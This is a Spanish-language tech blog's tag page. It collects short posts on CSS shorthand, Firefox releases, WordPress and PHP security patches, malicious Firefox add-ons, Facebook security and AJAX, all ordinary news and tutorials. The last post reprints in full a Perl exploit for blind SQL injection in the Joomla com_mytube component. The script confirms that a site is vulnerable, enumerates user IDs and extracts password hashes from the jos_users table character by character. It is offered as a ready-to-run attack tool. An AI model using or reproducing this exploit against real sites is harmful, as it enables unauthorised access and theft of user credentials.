Mostrando las entradas con la etiqueta web. Mostrar todas las entradas
Mostrando las entradas con la etiqueta web. Mostrar todas las entradas

miércoles, 3 de octubre de 2012

Propiedades Shorthand con CSS

Definir estilos de los elementos de un sitio web nos puede ocasionar la generación de archivos de estilos grandes y el navegador del usuario finalmente tiene que descargar los estilos para apreciar correctamente el sitio y la demora en la descarga de estos archivos nos podria ocasionar que el sitio web no se aprecie correctamente, esto se presenta con mucha freccuencia, sobre todo con conexiones lentas.

Las propiedades Shorthand de CSS permiten definir propiedades en pocas líneas y así disminuir al menos, el tamaño de las hojas de estilos y facilitar su comprensión.

Por ejemplo,

En una hoja de estilo tradicional se tendría algo así para definir el estilo de un párrafo:

p {
font-style: normal;
font-variant: small-caps;
font-weight: bold;
font-size: 1.5em;
line-height: 1.5;
font-family: Arial, sans-serif;
}

Pero lo mismo se puede definir respetando las propiedades short-hand, como se muestra el ejemplo a continuación:

p{
font: normal small-caps bold 1.5em/1.5 Arial, sans-serif;
}

Se logra un ahorro kbytes generados en los archivos de hojas de estilos y una mejor organización que permite comprender de mejor manera los estilos generados.

Via: librosweb.es

lunes, 22 de agosto de 2011

Mozilla lanza la versión de prueba del nuevo navegador Firefox 7

La versión beta presenta como principal mejora el que logra utilizar entre un 20 y un 30% menos de memoria que la que usan las anteriores versiones del programa.

Luego de estrenar hace poco tiempo el Firefox 6, Mozilla anunció en su blog oficial que la versión beta de Firefox 7 ya está ya se puede descargar para Mac, Windows, Linux y Android.

Según señaló la propia compañía del navegador de internet, el principal progreso de la nueva versión es el uso de memoria más eficiente debido al "recogedor de basura de JavaScript", el cual cumple un papel fundamental para "liberar memoria y mejorar el rendimiento cuando tienes muchas pestañas abiertas o dejas Firefox abierto durante mucho tiempo".

Es así como Firefox 7, logra utilizar entre un 20 y un 30% menos de memoria de la que usan las anteriores versiones del navegador, por lo que es menos probable que se quede "pegado" al momento de ser usado.

Asimismo, el nuevo software de prueba también presenta otras novedades incluyen la mejora de Firefox Sync o la aparición de nuevas herramientas para desarrolladores.

En cuanto a los progresos incluidos en la beta de Firefox 7 para Android, destacan también el énfasis en la utilización de poca memoria, además de la posibilidad de restaurar sesiones, copiar y pegar, y un Firefox Sync mejorado.

domingo, 21 de agosto de 2011

Tutorial de Inyección SQL para novatos

Para que sepan qué es un ataque de inyección SQL, les dejo el siguiente texto.
http://www.unixwiz.net/techtips/sql-injection.html

lunes, 11 de abril de 2011

Corregidas 3 vulnerabilidades en Wordpress

Ya está disponible la nueva versión de Wordpress 3.1.1 que corrige aproximadamente 30 fallos entre los que se incluyen 3 vulnerabilidades descubiertas por los desarrolladores Jon Cave y Peter Westwood.

Wordpress es un sistema de gestión de contenidos enfocado a la creación de blogs desarrollado en PHP y MySQL, ampliamente usado en la comunidad de bloggers debido a su facilidad de uso y sus características como gestor de contenidos.

Una de las vulnerabilidades corregidas permitía a un atacante remoto el secuestro de la sesión de autenticación al forzar al navegador de los usuarios autenticados a realizar acciones no autorizadas al visitar una página web especialmente manipulada.

Esta vulnerabilidad, localizada en el componente 'media uploader' permitía evadir la protección contra cross-site request forgery (CSRF). Ha sido corregida mediante la asociación de códigos únicos en las peticiones.

La segunda de las vulnerabilidades corregidas era un cross-site scripting (XSS) localizado en el código encargado de las actualizaciones de la base de datos.

Esta vulnerabilidad se debe a la insuficiente validación de los parámetros de entrada y podría ser empleada, en el peor de los casos, para generar páginas web especialmente manipuladas permitiendo la ejecución de código HTML o JavaScript en el contexto de otro sitio web.

Estas dos primeras vulnerabilidades fueron descubiertas y notificadas por Jon Cave, quien a su vez es miembro activo del equipo de seguridad de Wordpress.

La tercera y última vulnerabilidad, descubierta por Peter Westwood, permitía causar una denegación de servicio a través del uso de enlaces especialmente manipulados en los comentarios. El fallo en este caso, reside en la función 'make_clickable' del fichero 'wp-includes/formatting.php' al no comprobar la longitud de la URL en los comentarios antes de ser procesada por la libreria PCRE.

Junto con estas 3 vulnerabilidades, la nueva versión de Wordpress corrige a su vez 26 fallos entre los que cabría destacar el soporte con IIS6, permalinks relacionados con PATHINFO, así como varios problemas de compatibilidad con ciertos plugins.

Se recomienda la actualización a esta nueva versión de Wordpress, bien desde Dashboard -> updates o bien descargándola y realizando la actualización a mano.


Más Información:

Wordpress 3.1.1
http://wordpress.org/news/2011/04/wordpress-3-1-1/

martes, 29 de marzo de 2011

phpBB



phpBB es un sistema de creación de foros basado en el lenguaje PHP, con el que podrás generar uno en pocos minutos siempre y cuando tengas algunos conocimientos de programación.

Para que funcione necesitas tener instalado Apache y PHP, así como una base de datos. Permite crear foros con mensajes ilimitados y funciones como mensajería privada entre usuarios.

Descargar

domingo, 13 de marzo de 2011

Un bonito fondo de pantalla de jQuery

Para aprenderme los métodos de jQuery estuve buscando la manera de hacerlo más sencillo, aquí les dejo este fondo de pantalla con los métodos más usados de jQuery!

viernes, 28 de enero de 2011

Lanzan OpenLeaks, cibersitio rival de WikiLeaks

Un exvocero de WikiLeaks lanzó el viernes un cibersitio rival y anticipó que dará a los confidentes más control sobre los secretos que revelen.

La nueva plataforma, OpenLeaks, permitirá a las fuentes escoger selectivamente a quiénes desean transmitir los documentos de manera anónima, como ser un medio de prensa en particular, dijo Daniel Domscheit-Berg.

"Nos agradaría trabajar con medios que tengan interés en informar al público", dijo a la prensa en un aparte del Foro Económico Mundial de líderes políticos y empresariales en la ciudad suiza de Davos.

WikiLeaks se ha visto en aprietos para lidiar con la vasta cantidad de material que recibió —particularmente cientos de miles de cables diplomáticos estadunidenses— y ha sido criticada por compartir los datos solamente con un puñado de medios de prensa en el mundo.

Domscheit-Berg dijo que dar a los periodistas y analistas profesionales la oportunidad de recibir y revisar los documentos acelerará el proceso a la vez que restará presiones sobre OpenLeaks, ya que no publicará de por sí ningún material.

"No vamos a someternos al mismo escrutinio de gobiernos y grandes corporaciones como WikiLeaks", afirmó.

WikiLeaks y su fundador australiano Julian Assange han sido objetos de presiones desde que empezaron a publicar algunos de los 250 mil cables diplomáticos secretos en noviembre.

Domscheit-Berg, es vocero de WikiLeaks que se distanció de Assange, dijo que los dos cibersitios y otros a ser lanzados pronto se complementarán entre sí "descentralizando" el proceso de las revelaciones.

jueves, 27 de enero de 2011

¿Qué tan seguro es Facebook?

Facebook aseguró que un "error de programación" fue el culpable de la aparición de un extraño mensaje que parecía provenir del fundador de la empresa, Mark Zuckerberg.

En el mensaje, publicado en la madrugada del miércoles a nombre del multimillonario de 26 años en la página de fans de Facebook, se decía que era una buena idea que el sitio se convirtiera en un "negocio social" con inversión de sus usuarios.

"Que el hackeo comience. Si Facebook necesita dinero, en vez de ir a los bancos, ¿por qué Facebook no permite a sus usuarios invertir en Facebook de una forma social?", preguntaba.

La red social emitió un comunicado explicando la situación: "Un error de programación permitió la publicación de mensajes de estado por parte de personas no autorizadas en un puñado de páginas. El error ha sido corregido".

Según Facebook ningún perfil de usuario fue afectado por el incidente. Además, el sitio dio a conocer nuevas medidas de seguridad.

Pero la empresa de seguridad Sophos afirmó que era mejor que los usuarios de la red social tomaran precauciones.

Y algunos analistas consideran que la red social no está haciendo lo suficiente para mostrar a sus usuarios que su información está segura.

Más vale prevenir...

La irrupción en la cuenta corporativa de Zuckerberg es la segunda que sufre un personaje famoso en la red social en las últimas semanas. El anterior fue el presidente francés Nicolás Sarkozy.

"Los usuarios de Facebook -famosos o no- necesitan cuidar más la seguridad de su red social", dijo Graham Cluley, consultor de Sophos.

"Quizá Mark Zuckerberg quiera poner más atención al a configuración de su privacidad y seguridad tras esta embarazosa irrupción, y considerar quién tiene permitido publicar mensajes en su nombre".

"No es claro si descuidó su contraseña, si alguien la obtuvo en forma fraudulenta, o si se sentó en un Starbucks y se la robaron al usar una red inalámbrica abierta, pero sin importar como haya ocurrido lo ridiculizó justo cuando Facebook quiere reafirmar a sus usuarios que toma su seguridad y privacidad seriamente", señaló Cluley.

El mensaje del hacker fue visto por decenas de miles de personas antes de ser retirado del sitio. El texto contenía vínculos a una entrada de Wikipedia sobre negocios sociales y a un torneo de hackers organizado por Facebook.

¿Sabes quiénes son tus amigos?

Por lo pronto, este miércoles Facebook anunció una serie de nuevas medidas de seguridad que buscan impedir que episodios cómo éste se repitan.

Entre ellas la empresa afirma que comenzará a establecer conexiones seguras -con https:// en vez de http://- de forma tal que sus usuarios puedan optar por escoger dicho sistema en vez del convencional.

La característica será puesta a disposición de los usuarios gradualmente y habrá que "activarla dentro de la configuración de seguridad en la cuenta", según el comunicado de Facebook.

Otra opción para autentificar las cuentas es reconocer quiénes son nuestros amigos.

Si el sitio sospecha que alguien se está entrometiendo en una cuenta -si en la mañana ingresó desde Estados Unidos y dos horas más tarde desde Argentina, por ejemplo- pedirá que el usuario compruebe su identidad reconociendo a sus amigos.

El sistema mostrará la foto de uno de los "amigos" del usuario en Facebook y le solicitará que confirme su nombre de entre una lista de opciones. Si lo hace, entrará, si no, será rechazado.

Como medida adicional, desde hace algún tiempo, la red social permite que los usuarios vean desde dónde se están conectando a Facebook para detectar alguna actividad sospechosa.

Esto puede hacerse desde la opción "Configuración de cuenta" y después seleccionando "Seguridad de la cuenta".

martes, 7 de septiembre de 2010

2 - Ventajas y desventajas de AJAX.

Ventajas
  1. Utiliza tecnologías ya existentes.
  2. Soportada por la mayoría de los navegadores modernos.
  3. Interactividad. El usuario no tiene que esperar hasta que llegen los datos del servidor.
  4. Portabilidad (no requiere plug-in como Flash y Applet de Java)
  5. Mayor velocidad, esto debido que no hay que retornar toda la página nuevamente.
  6. La página se asemeja a una aplicación de escritorio.
Desventajas
  1. Se pierde el concepto de volver a la página anterior.
  2. Si se guarda en favoritos no necesariamente al visitar nuevamente el sitio se ubique donde nos encontrabamos al grabarla.
  3. La existencia de páginas con AJAX y otras sin esta tecnología hace que el usuario se desoriente.
  4. Problemas con navegadores antiguos que no implementan esta tecnología.
  5. No funciona si el usuario tiene desactivado el JavaScript en su navegador.
  6. Requiere programadores que conozcan todas las tecnologías que intervienen en AJAX.
  7. Dependiendo de la carga del servidor podemos experimentar tiempos tardíos de respuesta que desconciertan al visitante.
Via ajaxya

sábado, 4 de septiembre de 2010

1 - Qué es AJAX?




AJAX son las siglas de Asynchronous JavaScript And XML. No es un lenguaje de programación sino un conjunto de tecnologías (HTML-JavaScript-CSS-DHTML-PHP/ASP.NET/JSP-XML) que nos permiten hacer páginas de internet más interactivas.

La característica fundamental de AJAX es permitir actualizar parte de una página con información que se encuentra en el servidor sin tener que refrescar completamente la página. De modo similar podemos enviar información al servidor.

La complejidad se encuentra en que debemos domininar varias tecnologías:

* HTML o XHTML
* CSS
* JavaScript
* DHTML Básicamente debemos dominar todos los objetos que proporciona el DOM.
* XML Para el envío y recepción de los datos entre el cliente y el servidor.
* PHP o algún otro lenguaje que se ejecute en el servidor (ASP.Net/JSP)

Via Ajaxya

lunes, 19 de julio de 2010

Firefox y la (in)seguridad de sus extensiones y complementos

Vuelve a ocurrir. Un plugin para el navegador Firefox, alojado en la página oficial de Mozilla, estaba siendo utilizado para robar las contraseñas de los usuarios que lo utilizaran. También se ha hecho público que otro plugin contenía una grave vulnerabilidad que permitía la ejecución de código en el navegador. Es la cuarta vez que Mozilla sufre un incidente de seguridad relacionado con sus extensiones y complementos.

Uno de los mayores atractivos de Mozilla Firefox es la capacidad de extender su funcionalidad casi indefinidamente gracias a las extensiones. Existen miles, muy útiles, que han popularizado el navegador y lo han convertido además en una herramienta muy potente. Pero en esta ventaja radica también una de sus debilidades: la facilidad por parte de terceros para crear extensiones y alojarlas en la web oficial de Mozilla se está convirtiendo en un problema para los desarrolladores, que de nuevo han alojado una extensión peligrosa en addons.mozilla.org.

Mozilla Sniffer, una extensión disponible desde el 6 de junio en la página oficial, enviaba las contraseñas que el usuario introducía en los formularios a un sitio remoto, con el fin de robarlas. Era publicitada como una modificación del plugin TamperData. El problema ha sido descubierto el 12 de julio, y en ese espacio de tiempo ha sido descargado unas 1.800 veces. Mozilla alega que se encontraba en un estado "experimental", pero el problema va más allá.

En mayo de 2008 la Fundación Mozilla distribuyó por error el plugin del idioma vietnamita infectado con adware. Aunque prometió literalmente "analizar más a menudo sus archivos para evitar que esto vuelva a ocurrir", volvió a ocurrir en febrero de 2010. La fundación Mozilla informaba de que dos complementos "experimentales" para el navegador Firefox contenían troyanos para Windows. Entonces escribíamos en una-al-día: "hoy en día las firmas pueden tardar meses, como ha sido el caso, en ser añadidas y poder detectar (de forma estática) un archivo infectado. No sabemos qué métodos usa Mozilla para analizar sus archivos, pero el añadir nuevos métodos antivirus puede mitigar el problema aunque no tiene por qué solucionarlo."

Efectivamente, no lo ha solucionado. El problema con Mozilla Sniffer y por lo que ha pasado desapercibido para los antivirus, es que se trataba simplemente de una extensión programada específicamente para robar contraseñas silenciosamente. Solo una revisión pormenorizada del código, sin automatismos, hubiese revelado la funcionalidad oculta. Esto ataca directamente a la raíz del problema "de toda la vida" de la detección vírica: ¿qué es "malware"? Cualquier cosa programada con malas intenciones sin hacer partícipe al usuario. Desde luego, el malware no es exclusivamente "lo que detectan los antivirus", idea que un marketing agresivo y a veces irresponsable de las casas antivirus han incrustado en el usuario medio. Si Mozilla solo analiza sus complementos con antivirus asiduamente, estaba mitigando el problema, pero no lo solucionaba: detectará lo conocido y dejará pasar cualquier funcionalidad oculta específicamente diseñada, como ha ocurrido.

En defensa de Mozilla hay que decir que en su repositorio deja claro que ciertas extensiones no han sido verificadas, o que el autor es desconocido... en estos casos se delega en el usuario la responsabilidad de utilizar el código en entornos de producción. Pero todos sabemos que trasladar la responsabilidad al usuario no siempre acarrea buenos resultados.

Además, se ha detectado que el add-on CoolPreviews, contenía una vulnerabilidad que permitía la ejecución de código. La versión vulnerable ha sido descargada 177.000 veces.

Mozilla ha bloqueado estas extensiones, y anuncia que mejorará su proceso de validación y publicación, reconociendo implícitamente que se están cometiendo errores. A partir de ahora (de nuevo, a posteriori) dice que revisarán exhaustivamente el código antes de poner a disposición de todos una extensión en su web.


Más Información:

Add-on security vulnerability announcement
http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/

07/02/2010 Mozilla distribuye (otra vez) plugins para Firefox infectados
con malware desde el sitio oficial
http://www.hispasec.com/unaaldia/4124

Via Hispasec

martes, 2 de marzo de 2010

Nueva versión de PHP soluciona varios fallos de seguridad

Se ha publicado recientemente una nueva versión de PHP (versión 5.2.13) que ha solucionado dos fallos de seguridad.

PHP es un lenguaje interpretado de propósito general ampliamente usado, que está diseñado para desarrollo web y puede ser embebido dentro de código HTML. PHP está orientado a la creación de páginas web dinámicas, ejecutándose en un servidor web (server-side scripting), de forma que primero se toma el código en PHP como entrada y se devuelven las páginas web como salida.

El primero de los problemas reside en un fallo en el código de validación de safe_mode en la función tempnam(). Mientras que el segundo problema podría permir evitar los controles impuestos por open_basedir y safe_mode en la extensión de sesión.

Además, la nueva versión corrige otra serie de problemas de diversa índole. La nueva versión se encuentra disponible para descarga desde: http://www.php.net/downloads.php

Más Información:

PHP 5.2.13 Release Announcement
http://www.php.net/ChangeLog-5.php#5.2.13

miércoles, 20 de enero de 2010

Microsoft guarda seis meses la dirección ip de sus usuarios

Microsoft se plegó a las exigencia de privadidad de la Comisión Europea y guardará las direcciones IP de los usuarios durante seis meses

Las compañías que gestionan buscadores en internet, como Microsoft (cuyo buscador es ‘Bing’), Google y Yahoo! guardan durante algún tiempo la dirección de internet que les proporcionan los usuarios cuando realizan una consulta.

El grupo de trabajo formado por responsables de protección de datos de los 27 países comunitarios insistió en una carta enviada a estas empresas el pasado octubre en que debían rebajar el tiempo que retienen estas direcciones IP (el número que identifica a un ordenador) a 6 meses como máximo.

Microsoft indicó que, cuando un usuario utilice su buscador, ‘Bing’ procederá a separar los elementos de la búsqueda de cualquier información personal.

A continuación, la compañía aseguró que a los 6 meses borrará la dirección IP de ese internauta y, a los 18, cualquier otro elemento que identifique la sesión que inició ese usuario.

De esa forma, será imposible establecer una asociación entre el usuario y el rastro de las búsquedas que realizó en internet, señala la empresa.

Vassallo señaló que las búsquedas de los usuarios les permite ‘mejorar la calidad de los resultados, proteger contra el fraude y mantener un negocio seguro y viable’, pero que había que preservar la privacidad.

viernes, 6 de noviembre de 2009

joomla component com_mytube (user_id) Blind SQL Injection Vulnerability

#!/usr/bin/perl -w

#---------------------------------------------------------------------------------
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------

#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 15 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote
#---------------------------------------------------------------------------

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description :

#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.

#---------------------------------------------------------------------------


#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id

#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++


use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;

system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t| | Chip d3 Bi0s | |\n";
print "\t\t| MyRemote Video Gallery Bsql | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";


print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=);

$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

print "----------------Inyectando----------------\n";


$host = $target . "+and+1=1&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}

else

{print " [-] Vulnerable :)\n";

$d=0;


for ($idusuario=62;$idusuario<=80;$idusuario++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}

}

print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";

print " [-] # Usuario que desea extraer : ";chomp($iduss=);

for ($x=1;$x<=32;$x++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;} if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;


if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}


}
else
{

for ($c=48;$c<=57;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}


}

}

print " [+] Password :"." ".join('', @caracter) . "\n";

my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";

}
}

else

{print " [-] Exploit Fallo :(\n";}

# milw0rm.com [2009-09-21]

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)